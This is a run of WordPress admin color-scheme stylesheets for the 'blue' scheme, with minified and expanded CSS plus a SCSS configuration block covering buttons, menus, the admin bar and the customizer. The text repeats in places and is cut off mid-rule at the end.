.customize-controls-preview-toggle:focus,.wp-core-ui .customize-controls-preview-toggle:hover{color:#0073aa;border-top-color:#dd823b}.wp-core-ui .customize-panel-back:focus,.wp-core-ui .customize-panel-back:hover,.wp-core-ui .customize-section-back:focus,.wp-core-ui .customize-section-back:hover{color:#0073aa;border-right-color:#dd823b}.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover,.wp-core-ui .active-menu-screen-options .customize-screen-options-toggle,.wp-core-ui .customize-screen-options-toggle:active,.wp-core-ui .customize-screen-options-toggle:focus,.wp-core-ui .customize-screen-options-toggle:hover{color:#0073aa}.wp-core-ui #available-menu-items .item-add:focus:before,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before,.wp-core-ui #customize-save-button-wrapper .save:focus,.wp-core-ui #publish-settings:focus,.wp-core-ui .customize-screen-options-toggle:focus:before,.wp-core-ui .menu-item-bar .item-delete:focus:before,.wp-core-ui.wp-customizer button:focus .toggle-indicator:before{box-shadow:0 0 0 1px rgb(228.5391304348,157.7173913043,102.4608695652),0 0 2px 1px #dd823b}.wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus,.wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover,.wp-core-ui #customize-controls .customize-info.open .customize-help-toggle{color:#0073aa}.wp-core-ui .control-panel-themes .customize-themes-section-title:focus,.wp-core-ui .control-panel-themes .customize-themes-section-title:hover{border-right-color:#dd823b;color:#0073aa}.wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after{background:#dd823b}.wp-core-ui .control-panel-themes .customize-themes-section-title.selected{color:#0073aa}.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-outer-theme-controls .control-section:hover>.accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after,.wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after,.wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after,.wp-core-ui #customize-theme-controls .control-section:hover>.accordion-section-title:after{color:#0073aa}.wp-core-ui .customize-control .attachment-media-view .button-add-media:focus{background-color:#fbfbfc;border-color:#dd823b;border-style:solid;box-shadow:0 0 0 1px #dd823b;outline:2px solid transparent}.wp-core-ui .wp-full-overlay-footer .devices button.active:hover,.wp-core-ui .wp-full-overlay-footer .devices button:focus{border-bottom-color:#dd823b}.wp-core-ui .wp-full-overlay-footer .devices button:focus:before,.wp-core-ui .wp-full-overlay-footer .devices button:hover:before{color:#dd823b}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover{color:#dd823b}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow{box-shadow:0 0 0 1px rgb(228.5391304348,157.7173913043,102.4608695652),0 0 2px 1px #dd823b}.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover{border-bottom-color:#dd823b;color:#0073aa}/*! This file is auto-generated */ /* * Button mixin - creates a primary button effect. * Uses CSS custom properties for theme color support across color schemes. */ /* * Secondary button mixin - outlined style with theme color. * Matches Gutenberg's .is-secondary button variant. */ /* * Tertiary button mixin - transparent background, gray text. */ /** * This function name uses British English to maintain backward compatibility, as developers * may use the function in their own admin CSS files. See #56811. */ body { background: #f0f0f0; } /* Links */ a { color: #0073aa; } a:hover, a:active, a:focus { color: rgb(0, 149.5, 221); } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-revisions:before, span.wp-media-buttons-icon:before { color: currentColor; } /* Link button - appears as text link, no border or background */ /* Matches Gutenberg's .is-link button variant */ .wp-core-ui .button-link, .wp-core-ui .button.button-link { color: var(--wp-admin-theme-color); } .wp-core-ui .button-link:hover, .wp-core-ui .button-link:active, .wp-core-ui .button.button-link:hover, .wp-core-ui .button.button-link:active { color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-link:focus, .wp-core-ui .button.button-link:focus { color: var(--wp-admin-theme-color); border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-link:disabled, .wp-core-ui .button-link[aria-disabled=true], .wp-core-ui .button.button-link:disabled, .wp-core-ui .button.button-link[aria-disabled=true] { color: #949494; } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment, .wp-core-ui .button-link-delete { color: #cc1818; } .media-modal .delete-attachment:hover, .media-modal .trash-attachment:hover, .media-modal .untrash-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:focus, .wp-core-ui .button-link-delete:hover, .wp-core-ui .button-link-delete:focus { color: rgb(230.6842105263, 48.3157894737, 48.3157894737); } /* Forms */ input[type=checkbox]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } input[type=radio]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } .wp-core-ui input[type=reset]:hover, .wp-core-ui input[type=reset]:active { color: rgb(0, 149.5, 221); } input[type=text]:focus, input[type=password]:focus, input[type=color]:focus, input[type=date]:focus, input[type=datetime]:focus, input[type=datetime-local]:focus, input[type=email]:focus, input[type=month]:focus, input[type=number]:focus, input[type=search]:focus, input[type=tel]:focus, input[type=time]:focus, input[type=url]:focus, input[type=week]:focus, select:focus, textarea:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } input[type=checkbox]:focus, input[type=radio]:focus { border-color: #1e1e1e; box-shadow: 0 0 0 2px #ffffff, 0 0 0 4px var(--wp-admin-theme-color); outline: 2px solid transparent; } .wp-core-ui select:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .wp-tags-autocomplete .ui-state-focus, .wp-tags-autocomplete [aria-selected=true] { background-color: var(--wp-admin-theme-color); } #pass1:focus, #pass1-text:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .mailserver-pass-wrap .button.wp-hide-pw:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } /* Core UI */ .wp-core-ui { /* Default button - theme color border and text (matches secondary) */ } .wp-core-ui .button { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button:disabled, .wp-core-ui .button.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Secondary button - same as default */ } .wp-core-ui .button-secondary { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button-secondary:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-secondary:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-secondary:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button-secondary:disabled, .wp-core-ui .button-secondary.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Primary button - theme color background */ } .wp-core-ui .button-primary { background: var(--wp-admin-theme-color); border-color: transparent; border-radius: 2px; color: #fff; } .wp-core-ui .button-primary:hover { background: var(--wp-admin-theme-color-darker-10); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:focus { background: var(--wp-admin-theme-color); border-color: transparent; color: #fff; /* Gutenberg-style focus ring: outer theme color + inset white for contrast */ box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color), inset 0 0 0 1px #ffffff; /* Visible in Windows High Contrast mode */ outline: 1px solid transparent; } .wp-core-ui .button-primary:active { background: var(--wp-admin-theme-color-darker-20); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:disabled, .wp-core-ui .button-primary.disabled { background: #f0f0f0; border-color: transparent; color: #949494; cursor: not-allowed; } .wp-core-ui .button-primary.active, .wp-core-ui .button-primary.active:focus, .wp-core-ui .button-primary.active:hover { background: var(--wp-admin-theme-color-darker-10); color: #fff; border-color: transparent; box-shadow: none; } .wp-core-ui .button-group > .button.active { border-color: var(--wp-admin-theme-color); background: rgba(var(--wp-admin-theme-color--rgb), 0.08); } .wp-core-ui .wp-ui-primary { color: #fff; background-color: #52accc; } .wp-core-ui .wp-ui-text-primary { color: #52accc; } .wp-core-ui .wp-ui-highlight { color: #fff; background-color: #096484; } .wp-core-ui .wp-ui-text-highlight { color: #096484; } .wp-core-ui .wp-ui-notification { color: #fff; background-color: #e1a948; } .wp-core-ui .wp-ui-text-notification { color: #e1a948; } .wp-core-ui .wp-ui-text-icon { color: #e5f8ff; } /* List tables */ .wrap .page-title-action { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wrap .page-title-action:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wrap .page-title-action:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wrap .page-title-action:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .view-switch a.current:before { color: #52accc; } .view-switch a:hover:before { color: #e1a948; } /* Admin Menu */ #adminmenuback, #adminmenuwrap, #adminmenu { background: #52accc; } #adminmenu a { color: #fff; } #adminmenu div.wp-menu-image:before { color: #e5f8ff; } #adminmenu a:hover, #adminmenu li.menu-top:hover, #adminmenu li.opensub > a.menu-top, #adminmenu li > a.menu-top:focus { color: #fff; background-color: #096484; } #adminmenu li.menu-top:hover div.wp-menu-image:before, #adminmenu li.opensub > a.menu-top div.wp-menu-image:before { color: #fff; } /* Active tabs use a bottom border color that matches the page background color. */ .about-wrap .nav-tab-active, .nav-tab-active, .nav-tab-active:hover { background-color: #f0f0f0; border-bottom-color: #f0f0f0; } /* Admin Menu: submenu */ #adminmenu .wp-submenu, #adminmenu .wp-has-current-submenu .wp-submenu, #adminmenu .wp-has-current-submenu.opensub .wp-submenu, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu { background: #4796b3; } #adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-left-color: #4796b3; } #adminmenu .wp-submenu .wp-submenu-head { color: #e2ecf1; } #adminmenu .wp-submenu a, #adminmenu .wp-has-current-submenu .wp-submenu a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a { color: #e2ecf1; } #adminmenu .wp-submenu a:focus, #adminmenu .wp-submenu a:hover, #adminmenu .wp-has-current-submenu .wp-submenu a:focus, #adminmenu .wp-has-current-submenu .wp-submenu a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover { color: #fff; } /* Admin Menu: current */ #adminmenu .wp-submenu li.current a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a { color: #fff; } #adminmenu .wp-submenu li.current a:hover, #adminmenu .wp-submenu li.current a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus { color: #fff; } ul#adminmenu a.wp-has-current-submenu:after, ul#adminmenu > li.current > a.current:after { border-left-color: #f0f0f0; } #adminmenu li.current a.menu-top, #adminmenu li.wp-has-current-submenu a.wp-has-current-submenu, #adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head, .folded #adminmenu li.current.menu-top { color: #fff; background: #096484; } #adminmenu li.wp-has-current-submenu div.wp-menu-image:before, #adminmenu a.current:hover div.wp-menu-image:before, #adminmenu li.current div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before, #adminmenu li:hover div.wp-menu-image:before, #adminmenu li a:focus div.wp-menu-image:before, #adminmenu li.opensub div.wp-menu-image:before { color: #fff; } /* Admin Menu: bubble */ #adminmenu .menu-counter, #adminmenu .awaiting-mod, #adminmenu .update-plugins { color: #fff; background: #e1a948; } #adminmenu li.current a .awaiting-mod, #adminmenu li a.wp-has-current-submenu .update-plugins, #adminmenu li:hover a .awaiting-mod, #adminmenu li.menu-top:hover > a .update-plugins { color: #fff; background: #4796b3; } /* Admin Menu: collapse button */ #collapse-button { color: #e5f8ff; } #collapse-button:hover, #collapse-button:focus { color: #fff; } /* Admin Bar */ #wpadminbar { color: #fff; background: #52accc; } #wpadminbar .ab-item, #wpadminbar a.ab-item, #wpadminbar > #wp-toolbar span.ab-label, #wpadminbar > #wp-toolbar span.noticon { color: #fff; } #wpadminbar .ab-icon, #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar .ab-item:after { color: #e5f8ff; } #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojq .quicklinks .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojs .ab-top-menu > li.menupop:hover > .ab-item, #wpadminbar .ab-top-menu > li.menupop.hover > .ab-item { color: #fff; background: #4796b3; } #wpadminbar:not(.mobile) > #wp-toolbar li:hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar li.hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar a:focus span.ab-label { color: #fff; } #wpadminbar:not(.mobile) li:hover .ab-icon:before, #wpadminbar:not(.mobile) li:hover .ab-item:before, #wpadminbar:not(.mobile) li:hover .ab-item:after, #wpadminbar:not(.mobile) li:hover #adminbarsearch:before { color: #fff; } /* Admin Bar: submenu */ #wpadminbar .menupop .ab-sub-wrapper { background: #4796b3; } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary, #wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu { background: rgb(116.162375, 182.0949364754, 205.537625); } #wpadminbar .ab-submenu .ab-item, #wpadminbar .quicklinks .menupop ul li a, #wpadminbar .quicklinks .menupop.hover ul li a, #wpadminbar.nojs .quicklinks .menupop:hover ul li a { color: #e2ecf1; } #wpadminbar .quicklinks li .blavatar, #wpadminbar .menupop .menupop > .ab-item:before { color: #e5f8ff; } #wpadminbar .quicklinks .menupop ul li a:hover, #wpadminbar .quicklinks .menupop ul li a:focus, #wpadminbar .quicklinks .menupop ul li a:hover strong, #wpadminbar .quicklinks .menupop ul li a:focus strong, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a, #wpadminbar .quicklinks .menupop.hover ul li a:hover, #wpadminbar .quicklinks .menupop.hover ul li a:focus, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus, #wpadminbar li:hover .ab-icon:before, #wpadminbar li:hover .ab-item:before, #wpadminbar li a:focus .ab-icon:before, #wpadminbar li .ab-item:focus:before, #wpadminbar li .ab-item:focus .ab-icon:before, #wpadminbar li.hover .ab-icon:before, #wpadminbar li.hover .ab-item:before, #wpadminbar li:hover #adminbarsearch:before, #wpadminbar li #adminbarsearch.adminbar-focused:before { color: #fff; } #wpadminbar .quicklinks li a:hover .blavatar, #wpadminbar .quicklinks li a:focus .blavatar, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a .blavatar, #wpadminbar .menupop .menupop > .ab-item:hover:before, #wpadminbar.mobile .quicklinks .hover .ab-icon:before, #wpadminbar.mobile .quicklinks .hover .ab-item:before { color: #fff; } #wpadminbar.mobile .quicklinks .ab-icon:before, #wpadminbar.mobile .quicklinks .ab-item:before { color: #e5f8ff; } /* Admin Bar: search */ #wpadminbar #adminbarsearch:before { color: #e5f8ff; } #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus { color: #fff; background: rgb(109.571875, 185.228125, 212.128125); } /* Admin Bar: recovery mode */ #wpadminbar #wp-admin-bar-recovery-mode { color: #fff; background-color: #e1a948; } #wpadminbar #wp-admin-bar-recovery-mode .ab-item, #wpadminbar #wp-admin-bar-recovery-mode a.ab-item { color: #fff; } #wpadminbar .ab-top-menu > #wp-admin-bar-recovery-mode.hover > .ab-item, #wpadminbar.nojq .quicklinks .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus { color: #fff; background-color: rgb(202.5, 152.1, 64.8); } /* Admin Bar: my account */ #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { border-color: rgb(109.571875, 185.228125, 212.128125); background-color: rgb(109.571875, 185.228125, 212.128125); } #wpadminbar #wp-admin-bar-user-info .display-name { color: #fff; } #wpadminbar #wp-admin-bar-user-info a:hover .display-name { color: #fff; } #wpadminbar #wp-admin-bar-user-info .username { color: #e2ecf1; } /* Pointers */ .wp-pointer .wp-pointer-content h3 { background-color: #096484; border-color: rgb(7.3723404255, 81.914893617, 108.1276595745); } .wp-pointer .wp-pointer-content h3:before { color: #096484; } .wp-pointer.wp-pointer-top .wp-pointer-arrow, .wp-pointer.wp-pointer-top .wp-pointer-arrow-inner, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner { border-bottom-color: #096484; } /* Media */ .media-item .bar, .media-progress-bar div { background-color: #096484; } .details.attachment { box-shadow: inset 0 0 0 3px #fff, inset 0 0 0 7px #096484; } .attachment.details .check { background-color: #096484; box-shadow: 0 0 0 1px #fff, 0 0 0 2px #096484; } .media-selection .attachment.selection.details .thumbnail { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #096484; } /* Themes */ .theme-browser .theme.active .theme-name, .theme-browser .theme.add-new-theme a:hover:after, .theme-browser .theme.add-new-theme a:focus:after { background: #096484; } .theme-browser .theme.add-new-theme a:hover span:after, .theme-browser .theme.add-new-theme a:focus span:after { color: #096484; } .theme-section.current, .theme-filter.current { border-bottom-color: #52accc; } body.more-filters-opened .more-filters { color: #fff; background-color: #52accc; } body.more-filters-opened .more-filters:before { color: #fff; } body.more-filters-opened .more-filters:hover, body.more-filters-opened .more-filters:focus { background-color: #096484; color: #fff; } body.more-filters-opened .more-filters:hover:before, body.more-filters-opened .more-filters:focus:before { color: #fff; } /* Widgets */ .widgets-chooser li.widgets-chooser-selected { background-color: #096484; color: #fff; } .widgets-chooser li.widgets-chooser-selected:before, .widgets-chooser li.widgets-chooser-selected:focus:before { color: #fff; } /* Nav Menus */ .nav-menus-php .item-edit:focus:before { box-shadow: 0 0 0 1px rgb(232.1830985915, 189.5915492958, 115.8169014085), 0 0 2px 1px #e1a948; } /* Responsive Component */ div#wp-responsive-toggle a:before { color: #e5f8ff; } .wp-responsive-open div#wp-responsive-toggle a { border-color: transparent; background: #096484; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a { background: #4796b3; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { color: #e5f8ff; } /* TinyMCE */ .mce-container.mce-menu .mce-menu-item:hover, .mce-container.mce-menu .mce-menu-item.mce-selected, .mce-container.mce-menu .mce-menu-item:focus, .mce-container.mce-menu .mce-menu-item-normal.mce-active, .mce-container.mce-menu .mce-menu-item-preview.mce-active { background: #096484; } /* Customizer */ .wp-core-ui #customize-controls .control-section:hover > .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:hover, .wp-core-ui #customize-controls .control-section.open .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:focus { color: #0073aa; border-right-color: #e1a948; } .wp-core-ui .customize-controls-close:focus, .wp-core-ui .customize-controls-close:hover, .wp-core-ui .customize-controls-preview-toggle:focus, .wp-core-ui .customize-controls-preview-toggle:hover { color: #0073aa; border-top-color: #e1a948; } .wp-core-ui .customize-panel-back:hover, .wp-core-ui .customize-panel-back:focus, .wp-core-ui .customize-section-back:hover, .wp-core-ui .customize-section-back:focus { color: #0073aa; border-right-color: #e1a948; } .wp-core-ui .customize-screen-options-toggle:hover, .wp-core-ui .customize-screen-options-toggle:active, .wp-core-ui .customize-screen-options-toggle:focus, .wp-core-ui .active-menu-screen-options .customize-screen-options-toggle, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus { color: #0073aa; } .wp-core-ui .customize-screen-options-toggle:focus:before, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before, .wp-core-ui.wp-customizer button:focus .toggle-indicator:before, .wp-core-ui .menu-item-bar .item-delete:focus:before, .wp-core-ui #available-menu-items .item-add:focus:before, .wp-core-ui #customize-save-button-wrapper .save:focus, .wp-core-ui #publish-settings:focus { box-shadow: 0 0 0 1px rgb(232.1830985915, 189.5915492958, 115.8169014085), 0 0 2px 1px #e1a948; } .wp-core-ui #customize-controls .customize-info.open .customize-help-toggle, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover { color: #0073aa; } .wp-core-ui .control-panel-themes .customize-themes-section-title:focus, .wp-core-ui .control-panel-themes .customize-themes-section-title:hover { border-right-color: #e1a948; color: #0073aa; } .wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after { background: #e1a948; } .wp-core-ui .control-panel-themes .customize-themes-section-title.selected { color: #0073aa; } .wp-core-ui #customize-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after, .wp-core-ui #customize-outer-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after { color: #0073aa; } .wp-core-ui .customize-control .attachment-media-view .button-add-media:focus { background-color: #fbfbfc; border-color: #e1a948; border-style: solid; box-shadow: 0 0 0 1px #e1a948; outline: 2px solid transparent; } .wp-core-ui .wp-full-overlay-footer .devices button:focus, .wp-core-ui .wp-full-overlay-footer .devices button.active:hover { border-bottom-color: #e1a948; } .wp-core-ui .wp-full-overlay-footer .devices button:hover:before, .wp-core-ui .wp-full-overlay-footer .devices button:focus:before { color: #e1a948; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus { color: #e1a948; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow { box-shadow: 0 0 0 1px rgb(232.1830985915, 189.5915492958, 115.8169014085), 0 0 2px 1px #e1a948; } .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover { border-bottom-color: #e1a948; color: #0073aa; }$highlight-color: #096484; @use "../_admin.scss" with ( $scheme-name: "blue", $base-color: #52accc, $icon-color: #e5f8ff, $highlight-color: $highlight-color, $notification-color: #e1a948, $button-color: #e1a948, $menu-submenu-text: #e2ecf1, $menu-submenu-focus-text: #fff, $menu-submenu-background: #4796b3, $dashboard-icon-background: $highlight-color ); /*! This file is auto-generated */ /* * Button mixin - creates a primary button effect. * Uses CSS custom properties for theme color support across color schemes. */ /* * Secondary button mixin - outlined style with theme color. * Matches Gutenberg's .is-secondary button variant. */ /* * Tertiary button mixin - transparent background, gray text. */ /** * This function name uses British English to maintain backward compatibility, as developers * may use the function in their own admin CSS files. See #56811. */ body { background: #f0f0f0; } /* Links */ a { color: #0073aa; } a:hover, a:active, a:focus { color: rgb(0, 149.5, 221); } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-revisions:before, span.wp-media-buttons-icon:before { color: currentColor; } /* Link button - appears as text link, no border or background */ /* Matches Gutenberg's .is-link button variant */ .wp-core-ui .button-link, .wp-core-ui .button.button-link { color: var(--wp-admin-theme-color); } .wp-core-ui .button-link:hover, .wp-core-ui .button-link:active, .wp-core-ui .button.button-link:hover, .wp-core-ui .button.button-link:active { color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-link:focus, .wp-core-ui .button.button-link:focus { color: var(--wp-admin-theme-color); border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-link:disabled, .wp-core-ui .button-link[aria-disabled=true], .wp-core-ui .button.button-link:disabled, .wp-core-ui .button.button-link[aria-disabled=true] { color: #949494; } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment, .wp-core-ui .button-link-delete { color: #cc1818; } .media-modal .delete-attachment:hover, .media-modal .trash-attachment:hover, .media-modal .untrash-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:focus, .wp-core-ui .button-link-delete:hover, .wp-core-ui .button-link-delete:focus { color: rgb(230.6842105263, 48.3157894737, 48.3157894737); } /* Forms */ input[type=checkbox]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } input[type=radio]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } .wp-core-ui input[type=reset]:hover, .wp-core-ui input[type=reset]:active { color: rgb(0, 149.5, 221); } input[type=text]:focus, input[type=password]:focus, input[type=color]:focus, input[type=date]:focus, input[type=datetime]:focus, input[type=datetime-local]:focus, input[type=email]:focus, input[type=month]:focus, input[type=number]:focus, input[type=search]:focus, input[type=tel]:focus, input[type=time]:focus, input[type=url]:focus, input[type=week]:focus, select:focus, textarea:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } input[type=checkbox]:focus, input[type=radio]:focus { border-color: #1e1e1e; box-shadow: 0 0 0 2px #ffffff, 0 0 0 4px var(--wp-admin-theme-color); outline: 2px solid transparent; } .wp-core-ui select:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .wp-tags-autocomplete .ui-state-focus, .wp-tags-autocomplete [aria-selected=true] { background-color: var(--wp-admin-theme-color); } #pass1:focus, #pass1-text:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .mailserver-pass-wrap .button.wp-hide-pw:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 